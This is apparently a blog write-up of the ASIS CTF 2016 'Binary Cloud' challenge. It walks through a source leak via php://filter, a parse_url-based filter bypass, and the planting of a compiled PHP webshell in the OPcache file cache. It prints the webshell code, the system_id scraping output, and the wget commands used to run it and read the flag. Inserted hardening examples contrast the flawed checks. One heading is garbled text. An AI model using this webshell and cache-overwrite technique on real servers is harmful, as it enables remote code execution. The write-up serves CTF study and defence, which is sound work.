LoRexxar's Blog

Asis2016_Binary Cloud

2016/05/10

In last week's ASIS CTF 2016 there was a rather special challenge called Binary Cloud. The way to get a shell on it is the Binary Webshell Through OPcache in PHP 7 technique that was published only recently, which makes it quite interesting for real-world engagements (~￣▽￣)~

I did not actually solve the challenge during the contest; afterwards I read the writeup on ctftime:
http://corb3nik.github.io/asis%202016/Binary-Cloud/

Information gathering

First we notice a robots.txt:

User-Agent: *
Disallow: /
Disallow: /debug.php
Disallow: /cache
Disallow: /uploads

Opening /uploads and /cache returns Forbidden. On the debug page we find phpinfo(), which shows the PHP version is 7.0.4.

From this we guess that OPcache is enabled, and that the OPcache file cache lives at the /cache path listed in robots.txt:

opcache.file_cache=/home/binarycloud/www/cache

Looking further around the site, there is a file upload and a file include; the include can even be used to read the source of other files:
http://binarycloud.asis-ctf.ir?page=php://filter/convert.base64-encode/resource=upload


<?php
function ew($haystack, $needle) {
return $needle === "" || (($temp = strlen($haystack) - strlen($needle)) >= 0 && strpos($haystack, $needle, $temp) !== false);
}
function filter_directory(){
$data = parse_url($_SERVER['REQUEST_URI']);
$filter = ["cache", "binarycloud"];
foreach($filter as $f){
if(preg_match("/".$f."/i", $data['query'])){
die("Attack Detected");
}
}
}
function error($msg){
die("<script>alert('$msg');history.go(-1);</script>");
}
filter_directory();
if($_SERVER['QUERY_STRING'] && $_FILES['file']['name']){
if(!file_exists($_SERVER['QUERY_STRING'])) error("error3");
$name = preg_replace("/[^a-zA-Z0-9\.]/", "", basename($_FILES['file']['name']));
if(ew($name, ".php")) error("error");
$filename = $_SERVER['QUERY_STRING'] . "/" . $name;
if(file_exists($filename)) error("exists");
if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)){
die("uploaded at <a href=$filename>$filename</a><hr><a href='javascript:history.go(-1);'>Back</a>");
}else{
error("error");
}
}
?>

The main page that performs the include (index.php):

<?php
define("__INTERNAL__", "TRUE");
if(debug_backtrace()) goto pitfall;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>BinaryCloud &mdash; Upload your files, except PHP scripts!</title>
<link href="//netdna.bootstrapcdn.com/bootstrap/3.0.3/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<header class="navbar navbar-default navbar-fixed-top" role="banner">
<div class="header container">
<div class="navbar-header">
<button class="navbar-toggle" type="button" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href="/" class="navbar-brand">BinaryCloud</a>
</div>
<nav class="collapse navbar-collapse" role="navigation">
<ul class="nav navbar-nav">
<li><a href="?page=upload">Upload</a></li>
</ul>
</nav>
</div>
</header>
<div style="margin-bottom:30px;"></div>
<div class="container">
<?php
$filter = ["compress.zlib", "glob", "data", "http", "ftp", "phar"];
foreach($filter as $f){
stream_wrapper_unregister($f);
}
if(!$_GET) $_GET = Array("page" => NULL);
$page = ($_GET['page'] ? $_GET['page'] : "home");
@include($page . ".php");
?>
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js" type='text/javascript'></script>
</body>
</html>
<?php
pitfall:
?>

Reading the source carefully gives us a few pieces of information:
1. We cannot upload .php files, and the include automatically appends .php to the page name.
2. We cannot include a link that contains cache or binarycloud.
3. The uploaded file name is passed through preg_replace() and basename().

Combining this with the earlier information, we realise we can get a shell by planting a .php.bin file, i.e. the Binary Webshell Through OPcache in PHP 7 technique mentioned above.
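The upload check above only refuses names that end in ".php", which is exactly why a ".php.bin" cache file gets through. The following PHP is an added example and not code from the writeup or the challenge: it puts the page's ew()/preg_replace() name check beside a hardened variant (extension allowlist, reject ".php" anywhere in the name) and adds a realpath()-based check that the upload directory taken from the query string stays inside an allowlisted base. The extension allowlist and the demo base directory are assumptions made for the example.

```php
<?php
// Added example, not from the original writeup: the upload.php name check
// beside a hardened variant, run over constructed file names.

// Page's suffix check: true when $haystack ends with $needle.
function ew($haystack, $needle) {
    return $needle === "" || (($temp = strlen($haystack) - strlen($needle)) >= 0
        && strpos($haystack, $needle, $temp) !== false);
}

// Page's logic: keep only [a-zA-Z0-9.] and refuse names ending in ".php".
function page_name_allowed(string $upload_name): bool {
    $name = preg_replace("/[^a-zA-Z0-9\.]/", "", basename($upload_name));
    return !ew($name, ".php");
}

// Hardened: allowlist the extension and refuse ".php" anywhere in the name,
// so "debug.php.bin" is rejected although it does not end in ".php".
// The allowlist is an assumption for this example.
function hardened_name_allowed(string $upload_name, array $allowed_ext = ['txt', 'png', 'jpg']): bool {
    $name = basename($upload_name);
    if ($name === '' || $name[0] === '.') return false;
    if (stripos($name, '.php') !== false) return false;
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed_ext, true);
}

// Hardened target directory: the page trusts $_SERVER['QUERY_STRING'] as the
// directory; resolve it and require it to stay inside an allowlisted base,
// which keeps the OPcache file_cache directory out of reach by construction.
function target_dir_allowed(string $requested, string $base): bool {
    $real = realpath($requested);
    $base_real = realpath($base);
    if ($real === false || $base_real === false) return false;
    return $real === $base_real || strpos($real, $base_real . DIRECTORY_SEPARATOR) === 0;
}

// Constructed file names.
foreach (["notes.txt", "debug.php", "debug.php.bin", "debug.php.txt"] as $c) {
    printf("%-16s page=%s hardened=%s\n", $c,
        page_name_allowed($c) ? 'allow' : 'reject',
        hardened_name_allowed($c) ? 'allow' : 'reject');
}

// Constructed directory layout under the system temp dir for the demo.
$base = sys_get_temp_dir() . '/binarycloud_uploads_demo';
@mkdir($base . '/sub', 0700, true);
foreach ([$base . '/sub', $base . '/..', sys_get_temp_dir()] as $dir) {
    printf("%-48s %s\n", $dir, target_dir_allowed($dir, $base) ? 'inside base' : 'outside base');
}
```

Running it prints "debug.php.bin page=allow hardened=reject": the page's check only looks at the last four characters, whereas the hardened check treats the presence of ".php" as disqualifying and otherwise only admits a short allowlist. The directory check is the more important control here, because it no longer matters what the file is called if it cannot land under the OPcache directory at all.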

bypass鐩綍杩囨护

In upload.php we see:

function filter_directory(){
$data = parse_url($_SERVER['REQUEST_URI']);
$filter = ["cache", "binarycloud"];
foreach($filter as $f){
if(preg_match("/".$f."/i", $data['query'])){
die("Attack Detected");
}
}
}

The notable part is parse_url($_SERVER['REQUEST_URI']). This was a trick I had not seen before; the writeup's author puts it this way:
This function can be bypassed though, as parse_url takes a URL as a parameter. It does not deal well with URIs.
Extracting the URL's parameters with parse_url is problematic because it cannot handle every input: if we request an address like ///upload.php?cache, parse_url() returns false, so $data['query'] is empty and the subsequent preg_match has nothing to match against.
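To make the failure mode concrete, here is an added PHP example (not code from the writeup or the challenge) that runs the page's filter_directory() logic, reworked to take the request URI as an argument, beside a fail-closed variant over constructed request URIs. The hardened version rejects any URI that parse_url() cannot parse and matches against the raw query string the server dispatched on, which is the same value upload.php later uses as the directory. The PHP 7 parse_url() behaviour on "///" is the one the writeup describes.

```php
<?php
// Added example, not code from the writeup: the page's filter_directory()
// beside a fail-closed variant, run over constructed request URIs.

$filter = ["cache", "binarycloud"];

// Page's logic: parse the request URI and pattern-match the query component.
function filter_directory_page(string $request_uri, array $filter): bool {
    $data = parse_url($request_uri);
    // On "///upload.php?cache" parse_url() returns false (the PHP 7 behaviour
    // the writeup relies on); the page's $data['query'] is then null and
    // preg_match() runs against an empty string, so nothing is detected.
    $query = is_array($data) ? ($data['query'] ?? '') : '';
    foreach ($filter as $f) {
        if (preg_match("/" . $f . "/i", $query)) {
            return false;   // the page's die("Attack Detected")
        }
    }
    return true;
}

// Hardened: refuse anything parse_url() cannot parse, and match against the
// raw query string the server dispatched on instead of a re-parse of the URI.
function filter_directory_hardened(string $request_uri, string $query_string, array $filter): bool {
    if (parse_url($request_uri) === false) {
        return false;                       // fail closed on unparsable URIs
    }
    foreach ($filter as $f) {
        if (stripos($query_string, $f) !== false) {
            return false;
        }
    }
    return true;
}

// Constructed request URIs; $qs is what a server would put in
// $_SERVER['QUERY_STRING'] for each of them.
$cases = [
    "/upload.php?uploads",   // legitimate target directory
    "/upload.php?cache",     // caught by both versions
    "///upload.php?cache",   // page version lets this through
];
foreach ($cases as $uri) {
    $qs = strpos($uri, '?') === false ? '' : substr($uri, strpos($uri, '?') + 1);
    printf("%-22s page=%s hardened=%s\n", $uri,
        filter_directory_page($uri, $filter) ? 'allow' : 'block',
        filter_directory_hardened($uri, $qs, $filter) ? 'allow' : 'block');
}
```

The third case prints "page=allow hardened=block": the web server still hands upload.php the query string "cache" for "///upload.php?cache", so the directory check and the filesystem write see the dangerous value while the regex never does. A substring denylist remains the weaker design even after this fix; an allowlist of permitted upload directories resolved with realpath() is the control that actually closes the cache-overwrite path.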

Getting a shell via Binary Webshell Through OPcache in PHP 7

First we need to understand how the technique works:
http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
Wooyun has a translated version of the article:
http://drops.wooyun.org/web/15450

Our goal now is to overwrite the cached versions of debug.php, upload.php and index.php.

First we need to generate a debug.php.bin, i.e. the compiled version of the following file:

<?php
system($_GET['cmd']);
?>

According to the article we also need to compute the system_id. A nice script for that is
https://github.com/GoSecure/php7-opcache-override

$ ./system_id_scraper.py https://binarycloud.asis-ctf.ir/debug.php
PHP version : 7.0.4-7ubuntu2
Zend Extension ID : API320151012,NTS
Zend Bin ID : BIN_SIZEOF_CHAR48888
Assuming x86_64 architecture
------------
System ID : 81d80d78c6ef96b89afaadc7ffc5d7ea

It needs to be pointed at a page that exposes phpinfo().

Then we generate the malicious debug.php.bin locally, patch the system_id at the start of the file with a hex editor, and upload it. Note the path where debug.php.bin has to end up:

[cache location][system id][document root][debug.php.bin]

For this challenge that is:

cache/81d80d78c6ef96b89afaadc7ffc5d7ea/home/banarycloud/www

After that, visiting https://binarycloud.asis-ctf.ir/debug.php gives us our webshell:

wget -qO- https://binarycloud.asis-ctf.ir/debug.php?cmd="ls /"
WH4T_1S_7H3_FL4G
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

$ wget -qO- https://binarycloud.asis-ctf.ir/debug.php?cmd="cat /WH4T_1S_7H3_FL4G"
ASIS{5e00f204374f9ce481acc97294eda1f0}